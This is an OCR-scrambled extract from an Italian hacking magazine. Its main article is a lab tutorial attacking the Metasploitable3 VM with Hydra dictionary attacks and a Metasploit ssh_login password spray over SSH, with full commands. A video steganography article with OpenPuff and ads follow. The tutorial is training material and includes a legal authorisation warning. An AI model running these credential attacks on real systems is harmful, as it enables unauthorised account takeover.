Per l’installazione di entrambe, faremo ricorso a Vagrant; vmdk), dare un’occhiata alla sua configurazione, correggendo
supponendo di disporre di un sistema GNU/Linux Debian se necessario le eventuali impostazioni che Virtualbox stesso
like, la procedura da seguire è basata su questi step: dovesse segnalarci come non valide e ponendo, soprattutto,
la relativa network card sulla rete interna intnet (basta
• Installazione dell’hypervisor Virtualbox e del software accedere alla scheda “Rete” delle configurazioni);
Vagrant:
# apt-get update; • Download e deploy dell’immagine Vagrant di Kali
Linux:
# apt-get upgrade;
# vagrant init kalilinux/rolling
# apt-get install Virtualbox*;
# vagrant up
# apt-get install Vagrant*.

Anche in questo caso vale il suggerimento di verificare e


• Download e deploy dell’immagine Vagrant di
correggere la configurazione della VM (specie per quanto
Metasploitable3, all’interno di una directory dedicata:
riguarda le impostazioni della scheda di rete, da porre sulla
# vagrant init rapid7/metasploitable-win2k8 –box- rete interna intnet), mediante l’apposita interfaccia di VB.
version 0.1.0-weekly
# vagrant up • Configurazione della VM Kali, con particolare riferimento
alla necessità di assicurarne il collegamento – al pari della VM
• Configurazione della VM Metasploitable3: è opportuno, Metasploitable3 – alla rete interna intnet, al fine di garantire il
prima di avviare la VM (a cui il processo di deploy potrebbe colloquio tra la console del pentester e il sistema testato.

27
SICUREZZA
figura #8 figura #9

L’esecuzione di Hydra può richiedere del tempo, Ecco il sogno di ogni penetration tester: la
ma può portarci a individuare una coppia compromissione dell’account Administrator, per
di credenziali valide per l’accesso al sistema! giunta con un “semplice” password cracker!
lo scopo. Esistono infatti conservati, al momento, gli output che si vuole creare.
tantissimi software progettati e username enumerati. Hydra, tuttavia, non ha
realizzati proprio per eseguire bisogno di un file CSV, ma
questo particolare task: tra tutti, ESPORTAZIONE piuttosto di una semplice lista
non possiamo non citare Hydra DAL DATABASE (che si tratti di username o di
[figura #6], che molti di voi Finora ci siamo limitati password) di valori in cui ogni
probabilmente ricorderanno semplicemente a consultare item sia inserito,
dalle precedenti puntate di tali username [figura #5], ma il singolarmente, su una riga
questa serie. Per effettuare un comando “creds” sin qui distinta di un file di testo.
attacco del dizionario utilizzato ne consente anche Dobbiamo quindi sottoporre il
sull’autenticazione SSH, il tool ha l’esportazione in formato CSV CSV appena ottenuto a una
bisogno di due wordlist: l’elenco (Comma Separated Value), a piccola manipolazione,
delle password da provare e patto di invocarlo con l’opzione utilizzando awk:
l’elenco dei nomi utente da -o:
forzare. Se per la prima msf6> awk –F “\”,\”” ‘{print
possiamo rivolgerci, ancora una msf6> creds -o /home/ $4}’ /home/garrick/
volta, alla directory /usr/share/ garrick/metasploitable3/ metasploitable3/username.csv >
wordlists di Kali Linux, per la username.csv /home/garrick/metasploitable3/
seconda è necessario esportare i usernamePT.txt
contenuti del db interno di dove /home/garrick/
Metasploit, che rappresenta metasploitable3/username.csv in modo da estrarre il quarto
l’unico repository dove sono è il path assoluto del file di campo (quello che, per
l’appunto, specifica il nome
figura #10 Il modulo utente enumerato) di ciascuna
riga del file CSV, e salvare
ssh_login
l’elenco risultante nel file
consente di
usernamePT.txt (che nel
effettuare il login
nostro specifico caso è salvato
su un server SSH
nella directory /home/
remoto tramite
garrick/metasploitable3/). Al
credenziali
pari di awk, possiamo
specificate dal
utilizzare anche cat all’interno
pentester e/o di Metasploit, in modo da
prelevate da un poter visualizzare a video il
dizionario. risultato dei nostri sforzi:

28
DASDASDSDASDASDASD
METASPLOITABLE3
figura #11 • -s specifica la porta ove il
servizio target è posto in
ascolto;
• -t indica il numero di task
Le operazioni preliminari per utilizzare correttamente ssh_login: paralleli che Hydra può
è necessario selezionare il target, l’elenco degli username impiegare per velocizzare le
da utilizzare, l’elenco delle password (o la password, come nel operazioni di attacco.
nostro caso) da adoperare.
SECONDA SCANSIONE
• -L specifica, per l’appunto, il Dopo un certo tempo (quando
msf6> cat /home/garrick/
nome del file contenente la si lanciano attacchi alle
metasploitable3/usernamePT.txt
lista degli utenti da sottoporre password – siano essi basati
all’attacco; su dizionario, brute force o
ci mostra l’elenco dei nomi • -P individua la wordlist delle password spray – è sempre
utenti, pronto per essere dato potenziali password da buona norma armarsi di
in pasto a Hydra [figura #7]. provare per ciascun utente pazienza… oppure lavorare in
(visto che si tratta del primo parallelo su un’altra attività!),
HYDRA tentativo abbiamo optato per Hydra ci restituirà una
Dopo aver avviato il terminale, una wordlist dalle dimensioni schermata come quella di
navighiamo quindi nella piuttosto contenute, costituita [figura #8]: abbiamo trovato
directory /home/garrick/ da circa 100 password); una coppia di credenziali
metasploitable3/ ove abbiamo • -e nsr istruisce il tool a valide! Stiamo parlando delle
salvato l’elenco degli username. provare, in aggiunta a tale credenziali (vagrant, vagrant),
A questo punto non ci resta che lista, anche tre password che però – presentando una
invocare il tool, con il comando: “specifiche”: la password password coincidente con il
vuota, quella coincidente con nome utente – sono frutto del
# hydra -L usernamePT.txt -e nsr lo stesso nome utente, e ricorso all’opzione -e nsr
-P /usr/share/wordlists/ quella ottenuta dall’inversione appena illustrata. Stando così
metasploit/snmp_default_pass.txt dell’username (la coppia di le cose, dobbiamo concludere
metasploitable3 -s 22 ssh -t 32 credenziali [root,toor] vi che la wordlist utilizzata non
ricorda qualcosa, giusto per ha portato ad alcun risultato:
Ecco significato delle opzioni: rimanere in tema?); vale la pena effettuare almeno

Mettere mano alla configurazione di rete


169.254.161.202, nel vostro potrebbe differire), spostiamoci
U na volta installate le VM, abbiamo bisogno di
configurarne gli indirizzi di rete. A tal fine, se non si
vuole ricorrere a tool aggiuntivi (tenuto conto che in un
sulla VM Kali per completare la configurazione di rete,
secondo i seguenti step:
penetration test gli indirizzi IP da verificare sono • Assegnazione di un indirizzo IP nell’ambito della medesima
generalmente ben indicati, in quanto concorrono a rete locale di Metasploitable3, con il comando
identificare univocamente le macchine rientranti nello #sudo ifconfig eth0 169.254.161.10/24
scope della verifica), possiamo procedere a:
• Avviare la VM Metasploitable3; • Verifica della connettività tra le VM, con il comando:
• Selezionare la relativa finestra e attendere che termini il # ping 169.254.161.202
processo di boot;
• Posizionare il mouse sull’icona di rete posta nell’angolo in • Assegnazione del nome mnemonico metasploitable3 alla
basso a destra della suddetta finestra, e attendere qualche VM Metasploitable, eseguendo il comando:
istante che l’indirizzo IP della macchina sia visualizzato. # sudo echo “169.254.161.202 metasploitable3” >> /
Una volta noto l’indirizzo (nel nostro caso è etc/hosts

29
SICUREZZA
figura #12 peraltro ha la stessa password
del precedente, ovvero vagrant
[figura #9].

ANCORA METASPLOIT
A questo punto potremmo
raffinare ulteriormente l’attacco
provando a utilizzare una terza
wordlist… oppure lasciare a voi
Anche se non abbiamo compromesso ulteriori account, in questo questo esperimento, e virare su
momento disponiamo di due sessioni attive verso la macchina un altro tipo di attacco. Se infatti
target, una delle quali - peraltro - con privilegi di amministratore. la password vagrant è così
quotata da essere adoperata da
un secondo tentativo, potenziali candidati. ben due utenti, non è illogico che
adoperando un dizionario più Il comando per eseguire il possa essere stata scelta anche
ampio per incrementare le nuovo attacco è: da altri… Per verificare se sia così,
nostre chance di successo. dobbiamo eseguire il cosiddetto
Visto che per i nomi utenti la # hydra -L usernamePT.txt -e password spray attack,
strategia ha funzionato, nsr -P /usr/share/wordlists/ provando a sottoporre la
proviamo a optare per una metasploit/unix_passwords.txt medesima password (vagrant, per
wordlist delle password più metasploitable3 -s 22 ssh -t 32 l’appunto) a tutti gli username
diffuse in ambiente Unix: enumerati nelle puntate
/usr/share/wordlists/ e ci porta alla compromissione precedenti. Possiamo affidare
metasploit/unix_passwords. di un altro account: addirittura questo compito a Metasploit e al
txt, che vanta oltre 1.000 l’account Administrator, che suo modulo ssh_login

Metasploit: questo sconosciuto!


uno dei più noti framework per il penetration test, se non
È il più utilizzato al mondo (secondo quanto riportato dalla
società produttrice, Rapid7, la medesima della VM
citato database, con il comando:
# sudo systemctl start postgresql

Metasploitable).
• Inizializzare il database per il primo utilizzo, grazie a msfdb:
Si tratta di un tool in grado non solo di verificare il livello di
sicurezza di sistemi operativi, apparati di rete e web # sudo msfdb init
application, ma anche di fornire ai suoi utilizzatori un pletora
di strumenti in grado di spaziare dalla network discovery Una volta completate queste operazioni, possiamo:
all’individuazione e al successivo sfruttamento di vulnerabilità • Avviare Metasploit, con il comando:
note, sino all’esecuzione di attacchi di ingegneria sociale. Il
# msfconsole
tutto potendo contare su un database di exploit (oltre 1.500)
costantemente manutenuto e, soprattutto, sempre
• Creare un’apposita “area di lavoro” (workspace in inglese),
aggiornato.
che chiameremo semplicemente “metasploitable3”, ove far
Come se non bastasse, Metasploit dispone di una versione,
confluire – salvandole in un’area dedicata del database interno
“Metasploit Framework”, rilasciata gratuitamente da Rapid7
- tutte le evidenze che raccoglieremo nel corso del nostro
come software libero e non a caso inclusa nativamente
pentest (questa operazione va effettuata una sola volta):
all’interno della distribuzione Kali Linux che utilizziamo per
per il nostro pentest. Come visto nella scorsa puntata, prima msf6>workspace -a metasploitable3
di avviare Metasploit per la prima volta è opportuno
effettuare alcune piccole attività propedeutiche volte ad • Selezionare la suddetta workspace
assicurare la corretta configurazione del relativo database
msf6> workspace metasploitable3
interno:
• Avviare il servizio postgresql, a cui si deve la gestione del e iniziare il nostro lavoro!

30
DASDASDSDASDASDASD
METASPLOITABLE3
Pentest: cosa c’è da sapere, per non rischiare!
P rima di avviare una qualsiasi attività di pentesting/
vulnerability assessment su un’infrastruttura al di fuori del
nostro controllo e della nostra proprietà è bene ricordare
• Mai eseguire un penetration test (o anche solo una parte di
esso) su sistemi che non siano di vostra proprietà, a meno
che non si disponga di un permesso da parte di tutti i
quali possano essere le conseguenze di un uso scriteriato proprietari dell’infrastruttura da testare;
delle skill che apprenderete seguendoci in queste puntate. • Richiedere che tale permesso sia esplicitato in forma scritta
Non possiamo infatti dimenticarci quanto prevede l’articolo attraverso la cosiddetta manleva, ovvero un documento
615 ter del Codice Penale: “chiunque abusivamente si introduce formale che stabilisce le “regole d’ingaggio” per il pentester,
in un sistema informatico o telematico protetto da misure di chiarendo l’altro quali siano i sistemi da verificare, il tipo di
sicurezza ovvero vi si mantiene contro la volontà espressa o test effettuare e i vincoli a cui attenersi nell’esecuzione della
tacita di chi ha il diritto di escluderlo, è punito con la reclusione verifica di sicurezza.
fino a tre anni”. In qualità di penetration tester, potremmo
rischiare di ritrovarci accusati di aver effettuato un accesso Agli occhi della legge, è proprio la manleva (e il rispetto dei
abusivo a un sistema informatico, se – pur agendo in buona relativi termini) a distinguere un signor professionista (ovvero
fede – non provvediamo a seguire alcune regole basilari: il pentester) da un volgare pirata informatico…

[figura #10]: si tratta di un tool quindi preoccupiamoci di msf6> set PASSWORD vagrant
molto potente, in grado di impostare correttamente le
eseguire tanto un semplice login variabili che ci consentiranno di quindi avviare il modulo con il
SSH quanto di condurre diversi condurre l’attacco. Per i nostri seguente comando:
attacchi a questo tipo di scopi è sufficiente impostare –
autenticazione… incluso il oltre al target, l’elenco degli msf6>run
password spray attack di cui utenti enumerati e il valore della
abbiamo bisogno! password da provare per Contrariamente alle aspettative,
ciascun utente [figura #11]: il risultato non ci premia con
MODULO SSH_LOGIN ulteriori account compromessi:
Torniamo alla schermata del msf6> set RHOSTS ma in compenso, abbiamo
framework e carichiamo il metasploitable3 adesso [figura #12] due sessioni
modulo con il comando: msf6> set USER_FILE /home/ SSH aperte verso la macchina
garrick/metasploitable3/ target, una con l’account
msf6> use scanner/ssh/ssh_login usernamePT.txt Administrator (e quindi con
privilegi di amministratore!) e
figura #13 una con l’account vagrant. Come
se non bastasse, Metasploit ha
provveduto ad aggiornare
automaticamente il database
delle credenziali, associando la
password vagrant agli account
compromessi: ne possiamo
avere la prova eseguendo
nuovamente il comando:

msf6> creds
A seguito dell’esecuzione del modulo ssh_login e dell’effettiva
compromissione di due account, Metasploit aggiorna Un bel risultato [figura #13],
automaticamente l’elenco delle credenziali scoperte, associando non c’è che dire… e un’arma in
la password “vagrant” ai rispettivi account, come ci mostra l’output più da utilizzare nel prosieguo
del comando “creds”. del nostro pentest!

31
SICUREZZA

IL M E S S A G G I O
SI CELA
T R A I P I X E L io ni te stua li, audio, immagini e file
fo rm az
Come nascondere in ù vi de o, in qu al si as i formato, anche
oo pi
binari all’interno di un
lla steganografia
compresso. Magia de

a continua evoluzione visto che storicamente risale a essere nascosti all’interno del file

L tecnologica ha imposto lo
sviluppo e l’avanzamento di
determinate tecnologie che
hanno portato, in pochi anni, alla
produzione di dispositivi di
oltre 2.000 anni fa), le tecniche
per nascondere informazioni
possono essere utilizzate per
mitigarne gli attacchi informatici,
fornendo proprietà di sicurezza,
cover mentre per embedding
efficiency si intende la capacità
dell’algoritmo di steganografia di
nascondere quante più
informazioni sensibili senza
storage sempre più capienti e, in privacy, confidenzialità e integrità creare distorsioni apprezzabile al
proporzione, meno costosi, a un dei dati. I due aspetti più file cover (impercettibilità).
netto miglioramento delle importanti di un algoritmo
capacità delle videocamere anche steganografico, che si tratti di un UN PO’ DI TEORIA
per le “entry-level” e a sensori file testo, immagini, audio o video Ulteriori caratteristiche richieste
sempre più performanti a costi [figura #1], sono le proprietà che alla video-steganografia, così
contenuti. Lo scenario riportato vanno sotto il nome di come a qualsiasi altro metodo
ha incrementato embedding payload e steganografico, vedono la
esponenzialmente l’ammontare embedding efficiency. sicurezza e la robustezza anche
dei dati trasferiti via rete o cavo e L’embedding payload indica la dal punto di vista della
di riflesso negli appositi dispositivi quantità di dati che possono compressione dei dati intesa

figura #1
di memorizzazione (hard disk,
flash USB ecc.) tipicamente La classificazione
informazioni sensibili come dati dei metodi
personali, immagini, informazioni steganografici
medicali, dettagli bancari e digitali si divide in
videoriprese pubbliche e/o private. quattro
sottocategorie:
E LA SICUREZZA? immagini, testo,
Argomenti di ricerca fin dalla audio e video.
nascita delle comunicazioni
digitali (sebbene la steganografia
non risulti essere tanto recente,

32
STEGANOGRAFIA VIDEO
GLOSSARIO
come la capacità di non perdere DI BASE
le informazioni che celano in
seguito a una compressione del COVER MEDIA Il file che celerà le dei metodi più noti è ad esempio
file stego, di qualsiasi tipo e a informazioni riservate. l’LSB (Least Significant Bits).
qualsiasi formato ci si riferisca. Generalmente si tratta di un video,
Va da sé come occorra accettare ma può essere anche un file di SCRAMBLING Rendere
testo, un file pdf, immagini o file indecifrabile, codificare, criptare.
sempre un compromesso tra la
audio nei diversi formati. Metodologie con le quali viene
sicurezza, la robustezza e la manipolato un file audio/video/dati
capacità di nascondere dati STEGO MEDIA È il file risultante, per renderlo intellegibile.
senza creare artefatti audiovisivi completo di informazione segrete,
che potrebbero far sorgere ottenuto dopo aver applicato TRANSFORM DOMAIN Questo
qualche sospetto. l’algoritmo di steganografia al metodo converte blocchi di
Cover Media. fotogrammi del file cover dal
dominio spaziale al dominio di
FRAME PER SECONDO STEGANALISI Scienza il cui scopo trasformazione così definito
Nella sua forma più intuitiva è vede la rilevazione, previa poiché vengono applicati metodi
possibile considerare un video opportuna analisi in funzione del matematici; tra i più usati risultano
come un insieme di immagini formato del file, di informazioni la DWT (Discrete Wavelet
statiche (frame) prese in istanti nascoste. Transform), la DCT (Discrete
Un esempio di base di Steganalisi Cosine Transform) e loro inverse. I
temporali differenti. Quando
è stato riportato nel numero 267 dati segreti vengono incorporati
vengono mandate in esecuzione di HJ. nei coefficienti della
una dopo l’altra ne risulta il tipico trasformazione nei bit meno
movimento da pellicola SPATIAL DOMAIN Tecnica che significativi prima di eseguire la
cinematografica. Per evitare utilizza i valori di intensità che trasformazione inversa e il
possono assumere i pixel nel “riassemblaggio” per produrre il
“movimenti a scatto” e avere una
cover frame per nascondere i dati file stego. Le descrizioni formali
buona fluidità il minimo numero segreti, ad esempio nei bit esulano dal seguente contesto e si
di frame necessari in un secondo dell’intensità del colore per i 3 rimanda gli interessati a testi
non dovrebbe scendere sotto i colori RGB (Red-Green-Blue). Uno specializzati.
25 ovvero, nella nostra analogia,
considerando una persona che
cammina, al soggetto deve dall’altro sono richieste maggiori a entrare in un’area riservata e
essere fatta una fotografia ogni capacità di storage nel caso si rilevate nelle sequenze video
1/25 secondo (40 millisecondi). volesse memorizzare tutto su catturate dalla telecamera di
Va da sé che se il numero di hard disk o di flusso in streaming, sorveglianza; i dati dei soggetti
frame è pari a 30 (33ms a e quindi di banda di rete, qualora rilevati possono essere
quadro) o a 60 (16,7ms a quadro) lo si volesse trasmettere. In base incorporati nelle sequenze video.
i movimenti diventano sempre ai concetti riportati, la video
più armoniosi e realistici, di steganografia nella sua forma IL DOMINIO COMPRESSO
contro c’è il numero di basilare può essere vista come I metodi di steganografia raw
fotogrammi che passa, ad una sorta di “estensione” della domain considerano il Cover
esempio in un tempo di soli 60 steganografia applicata alle Media come una sequenza di
secondi, dai 1.500 nel caso di immagini. I campi di utilizzo fotogrammi all’interno dei quali
25fps (frame per secondo) ai vanno dallo spionaggio vengono nascoste le
1.800 per 30fps per arrivare ai industriale e governativo, militare informazioni previo uso di
3.600 per 60fps. Se da un lato si e paramilitare, settore medicale e diverse tecniche le quali
migliora la realtà del movimento multimedia. Applicazioni più possono operare nel dominio
(sebbene oltre un certo limite comuni vedono la steganografia spaziale (Spatial Domain)
l’occhio umano non riesce più a video utilizzata per preservare la oppure nel dominio della
percepirne le differenze), privacy delle persone autorizzate frequenza (Transform Domain);

33
SICUREZZA
figura #2 figura #3

Dallo schema di codifica appare netta la distinzione Le informazioni che si vogliono celare vengono
tra quello che viene definito “raw domain” (dominio incorporate in uno o più fotogrammi del video.
grezzo) e il “compressed domain”.

fare riferimento alle omonime preferiti per lo stoccaggio e la UN ESEMPIO


voci nei glossari. Prima trasmissione poiché è richiesto APPLICATIVO
dell’inclusione l’informazione da meno spazio per la loro Le nozioni riportate sono solo
celare viene sottoposta a una archiviazione, il trasferimento via una piccola parte di un mondo
pre-elaborazione per l’eventuale rete è più veloce e richiede meno dedicato alla video steganografia,
applicazione di un algoritmo di larghezza di banda. Con queste sempre in evoluzione con nuove
cifratura e di un codice di premesse le tecniche di tecniche, migliorie di quelle
correzione errori al fine di occultamento dati nel dominio conosciute riportate nelle varie
garantirne la sicurezza e compresso hanno guadagnato pubblicazioni o presentate a
l’integrità dei dati qualora il inevitabilmente popolarità negli convegni e conferenze. La scelta
Cover Media subisse attacchi o ultimi tempi. di un programma è sempre non
“cadute di fotogrammi” durante Di contro, provocando la facile da attuare considerando
la trasmissione. compressione, la rimozione di che trattasi anche di argomenti
La maggior parte dei metodi di elementi ridondanti riduce lo “di nicchia” (sebbene molto
steganografia video proposti spazio necessario a nascondere studiati) e, anche se
utilizza tecniche Raw Domain informazioni e in alcuni casi può principalmente open source, non
perché sono intuitivi nel principio scendere nell’ordine dei byte o si trovano quasi mai nei
di funzionamento e facili da addirittura rendere il video repository delle distribuzioni se
implementare in termini di inadeguato a fungere come non in casi specifici.
codice da scrivere ([figura #2] carrier! Il programma OpenPuff
e [figura #3]). Ma se da un lato
c’è la facilità di implementazione
dall’altro c’è il problema che Ampliamo le conoscenze
trattasi di tecniche facilmente
ltre a OpenPuff suggeriamo il network gratuito ResearchGate (https://www.
attaccabili in particolare dai
cosiddetti attacchi di
O researchgate.net/) dedicato a tutte le discipline scientifiche nel quale
scienziati e ricercatori condividono articoli, rispondono a quesiti e trovano
compressione. C’è in realtà collaboratori. Inserendo nel rigo di ricerca una stringa come video
anche un motivo più pratico che steganography verranno riportati decine e decine di risultati alcuni dei quali è
possibile consultare direttamente poiché presente l’associato documento o
rende la video steganografia raw
pubblicazione generalmente in formato PDF.
domain meno utilizzabile; i video
in forma compressa sono

34
STEGANOGRAFIA VIDEO
figura #4 l’informazione segreta in più file
anche di natura diversa tra loro,
ad esempio utilizzando 2 file PDF,
1 file MP3, 2 file video ecc. In
sostanza “pezzi” (chunk)
dell’informazione complessiva
verranno celati nei 2 file video,
un’altra certa quantità nei 2 file
PDF e così via. L’utente per poter
recuperare l’informazione dovrà
essere in possesso di tutti i file;
un po’ come accade con gli
L’installazione in Windows di OpenPuff non necessita di particolari archivi compressi multipli, se non
accorgimenti. E anche in GNU/Linux non comporta alcun problema si hanno tutti i file a partire dal
poiché è dato pienamente funzionante con WINE (https://www.winehq. numero 1 non è possibile
org/) e pertanto andrà installato utilizzando il gestore dei pacchetti. recuperare l’intero contenuto.
OpenPuff oltre che
permette di raggiungere gli presenza di Wine e procederà steganografico è anche un
obiettivi indicati. Noi l’abbiamo eventualmente all’installazione programma multi crittografico; i
testato su distribuzione ROSA per poi lanciare il programma. Lo dati vengono dapprima
Linux (https://www.rosalinux.ru/) script Uninstall.sh se lanciato sottoposti a crittografia, fa
e tutto ciò che occorre fare, una cancellerà tutta la cartella seguito un’operazione di
volta effettuato il download e OpenPuff_release e rimuoverà scrambling quindi aggiunto del
decompresso il file zip, è entrare la cartella nascosta .wine nella “rumore” casuale (whitening). A
nella cartella creata dalla home utente, quindi attenzione dispetto di questa apparente
decompressione cd OpenPuff_ perché in caso vi fossero installati complessità, il suo uso è molto
release e lanciare il comando dei programmi che girano in intuitivo e si riduce a 4 passi
wine ./OpenPuff.exe il quale Wine questi verrebbero essenziali. Vediamoli in dettaglio.
non installerà nulla, lancerà cancellati! Dalla schermata di [figura #4]
direttamente il programma clicca su Hide nel pannello
[figura #4]. Lo script OpenPuff. ALTRE FUNZIONALITÀ Steganography per entrare nella
sh verificherà, su distribuzioni Molto interessante la capacità di sezione Data Hiding [figura #5].
Debian/Ubuntu e derivate, la OpenPuff di nascondere Nel riquadro (1) dovranno essere
inserite le password tra loro non
figura #5 correlate necessarie alla
crittografia e allo scrambling.
Nel riquadro di destra (2) occorre
indicare i dati che si desiderano
nascondere utilizzando il
pulsante Browser. Nel rigo Size
verrà riportata la dimensione che
il/i file carrier dovranno
nascondere. Il totale del valore
verrà riportato nel riquadro (3)
Carrier Selection nel rigo in
OpenPuff consente di celare i dati all’interno di tipologie diverse basso Selected/Total dove
occorre aggiungere il o i carrier
di cover media. In ogni momento si può conoscere la dimensione
che dovranno farsi carico di
che i carrier dovranno nascondere.

35
SICUREZZA
figura #6 Occorre rispettare 3 regole
fondamentali: inserire
correttamente le password (A
con A, B con B e C con C),
rispettare l’ordine dei carrier in
fase di implementazione
(colonna Chain Order)
aggiungendo i file stego uno
dopo l’altro in base all’ordine di
implementazione originale e
infine rispettare l’esatta selezione
in Bit Selection Options ai valori
Con OpenPuff è possibile utilizzare un certo numero di carrier originali per ogni singolo formato
con le immagini nei formati BMP, JPG, PCX, PNG e TGA, audio con di file utilizzato come carrier e
supporto ad AIFF, MP3, NEXT/SUN e WAV, documenti PDF e file video infine indicando il percorso di
(3GP, FLV, MP4, MPG, SWF, VOB). salvataggio [figura #6].
In [figura #7] il confronto tra 2
nascondere i dati. ciò che andrà ad alterare il file e dei 4 file originali utilizzati dal
Se ne dovranno aggiungere in che potrebbe destare qualche programma e i rispettivi file
numero e tipologia tali da riuscire sospetto. A titolo di esempio, in stego. Essendo dei video una
a coprire il totale da celare. un file VOB di circa 40MB è fotografia non rende l’idea, gli
Quando ciò accadrà il rigo possibile nascondere poco meno interessati non possono che
Selected/Total diventerà verde di 7KB impostando il massimo provare la procedura e
e sarà quindi possibile passare numero di bit ½ (50%) in Bit constatare loro stessi il risultato.
al riquadro (4) Bit Selection Selection Options. Al termine Il software è sviluppato da un
Options per la selezione del click sul pulsante Hide Data in ingegnere italiano, quindi si ha il
numero di bit da utilizzarsi basso a destra indicando il manuale (anche) in questa lingua,
(tecnica LSB). Può sorprendere la percorso di salvataggio dove che suggeriamo di leggere poiché
bassa capacità di dovranno essere salvati i file entra nel vivo del principio di
immagazzinamento dei file video, stego. Per il recupero dalla funzionamento del programma e
ma se si vuole avere maggiore schermata di [figura #4] optare dal punto di vista della
sicurezza e più impercettibilità va per Unhide nel pannello crittografia così come su alcuni
da sé che deve ridursi l’entità di Steganography. concetti di steganografia e

figura #7
stagnalisi. In più raccomandiamo
di visitare il sito di OpenPuff
poiché presenta nella pagina del
software una vera e propria
miniera di informazioni, articoli,
pubblicazioni, video, letture, tesi
e svariati esempi applicativi
sull’argomento (leggere anche il
Box di pagina 34 “Ampliamo le
conoscenze”). Al solito in caso di
comunicazioni, suggerimenti,
prove e quant’altro si può
sempre fare riferimento al forum
Il confronto: a sinistra 2 file originali, 2 stego destra di HJ (https://hackerjournal.it/
e al centro l’informazione nascosta. forum/).

36
ABBONATI
ALLA TUA RIVISTA PREFERITA
TE LA SPEDIAMO APPENA STAMPATA!
SOLO ARTICOLI ORIGINALI DEI MIGLIORI ESPERTI IN CIRCOLAZIONE SIAMO
TOR
CONSEGNA GARANTITA ENTRO 48H
N.274 Novembre\Dicembre

TREMNAATTEI
SMARTPHONE
A PROVA
DI SPIA!
App 100% legali potrebbero nascondere
delle insidie. Le dritte per sgamarle
SOLO ARTICOLI ORIGINALI DEI MIGLIORI ESPERTI IN CIRCOLAZIONE SIAMO
TORN

N.274 Novembre\Dicembre
TREMATATEI
SMARTPHONE
Dal 2002 tutto quello che gli altri non osano dirti A PROVA
www.hackerjournal.it

La rete anticensura
DI SPIA!
App 100% legali potrebbero nascondere
delle insidie. Le dritte per sgamarle
oltre il Dark Web
Si accede tramite un apposito tool Dal 2002 tutto quello che gli altri non osano dirti

www.hackerjournal.it
e ci si trova davvero l’impossibile. La rete anticensura
Cosa abbiamo scoperto oltre il Dark Web
Si accede tramite un apposito tool
e ci si trova davvero l’impossibile.
Gothic 2 conquista Cosa abbiamo scoperto

anche il Pinguino Gothic 2 conquista


TARIFFA R.O.C. Poste Italiane S.p.A. – spedizione in abbonamento postale – MBPA/LO-NO/125/A.P./2017- ART.1 COMMA1- S /NA

anche il Pinguino
TARIFFA R.O.C. Poste Italiane S.p.A. – spedizione in abbonamento postale – MBPA/LO-NO/125/A.P./2017- ART.1 COMMA1- S /NA

Siamo riusciti a installare su Linux Siamo riusciti a installare su Linux


questo mitico gioco di ruolo. questo mitico gioco di ruolo.
Ecco il diario della ricompilazione
Ecco il diario della ricompilazione
NDERSI
LA GUIDA PER DIFE

LA GUIDA PER DIF


ENDERSI
Così entrano A PAGINA

Così entrano
10
A PAGINA
10 in Windows
in Windows
Gli utenti ignari installano una semplice DLL mancante
nel sistema e aprono così la porta ai pirati per sferrare un attacco
di Privilege Escalation nell’host target
PASSWORD
CRACKING
Come funziona un
DITE STOP AL IL MESSAGGIO
Gli utenti ignari installano una semplice DLL mancante “attacco a dizionario” TRACCIAMENTO SI CELA TRA I PIXEL
per scoprire le chiavi Il tool consigliato da Anonymous Come nascondere testi e foto in
nel sistema e aprono così la porta ai pirati per sferrare un attacco di accesso che protegge la tua privacy online un video grazie alla steganografia

di Privilege Escalation nell’host target


PASSWORD Con l’abbonamento cartaceo
CRACKING DITE STOP AL IL MESSAGGIO
Come funziona un
“attacco a dizionario” TRACCIAMENTO SI CELA TRA I PIXEL la versione digitale
per scoprire le chiavi
di accesso
Il tool consigliato da Anonymous
che protegge la tua privacy online
Come nascondere testi e foto in
un video grazie alla steganografia è in OMAGGIO!

DISPONIBILE ANCHE SOLO


Riceverai 6 numeri a soli IN VERSIONE DIGITALE

-24% -53%
CARTACEO DIGITALE
6 numeri 6 numeri
solo 17,90€ solo 10,90€
invece di 23,40€ invece di 23,40€

Scansiona il QrCode per abbonarti oppure contattaci


Telefono online email WhatsApp
02 87168197 www.sprea.it/hackerjournal abbonamenti@sprea.it 329 3922420
Solo messaggi
Informativa ex Art.13 LGS 196/2003. I suoi dati saranno trattati da Sprea SpA, nonché dalle società con essa in rapporto di controllo e collegamento ai sensi dell’art. 2359 c.c. titolari del trattamento, per dare corso alla sua richiesta di abbonamento. A tale scopo, è indispensabile il conferimento dei dati anagrafici. Inoltre previo
suo consenso i suoi dati potranno essere trattati dalle Titolari per le seguenti finalità: 1) Finalità di indagini di mercato e analisi di tipo statistico anche al fine di migliorare la qualità dei servizi erogati, marketing, attività promozionali, offerte commerciali anche nell’interesse di terzi. 2) Finalità connesse alla comunicazione dei
suoi dati personali a soggetti operanti nei settori editoriale, largo consumo e distribuzione, vendita a distanza, arredamento, telecomunicazioni, farmaceutico, finanziario, assicurativo, automobilistico e ad enti pubblici ed Onlus, per propri utilizzi aventi le medesime finalità di cui al suddetto punto 1) e 2). Per tutte le finalità
menzionate è necessario il suo esplicito consenso. Responsabile del trattamento è Sprea SpA via Torino 51 20063 Cernusco SN (MI). I suoi dati saranno resi disponibili alle seguenti categorie di incaricati che li tratteranno per i suddetti fini: addetti al customer service, addetti alle attività di marketing, addetti al confezionamento.
L’elenco aggiornato delle società del gruppo Sprea SpA, delle altre aziende a cui saranno comunicati i suoi dati e dei responsabili potrà in qualsiasi momento essere richiesto al numero +39 0287168197 “Customer Service”. Lei può in ogni momento e gratuitamente esercitare i diritti previsti dall’articolo 7 del D.Lgs.196/03 – e
cioè conoscere quali dei suoi dati vengono trattati, farli integrare, modificare o cancellare per violazione di legge, o opporsi al loro trattamento – scrivendo a Sprea SpA via Torino 51 20063 Cernusco SN (MI).
SICUREZZA

PHISHING
E FA C I N G
E DNICHE E STRATEGIE
TEC
D I P ROT E Z I O N E
elle più adoperate
tacco rientrano tra qu
Queste tipologie di at
U cr ai na . Il lo ro sc op o è quello di fare
sia-
nella cyberguerra Rus m e fu nz io na no e co me ci si difende
i. Ecco co
incetta di dati personal

artiamo con il phishing. parole, ingannano gli utenti INDIZI UTILI

P Minaccia costante nel


panorama della
sicurezza informatica, è
adoperato nella cyberguerra
Russia-Ucraina soprattutto per
attraverso mezzi e tecniche
d’ingegneria sociale, al fine di
manipolare le vittime e indurle,
appunto, a rivelare informazioni
riservate o compiere azioni
Per proteggersi efficacemente
dal phishing è fondamentale
essere in grado di riconoscere
gli indicatori comuni che
possono suggerire la presenza
tentare di sottrarre ai soldati indesiderate. di un attacco. Alcuni elementi da
informazioni tattiche e
strategiche, così da creare
ulteriore scompiglio. Una
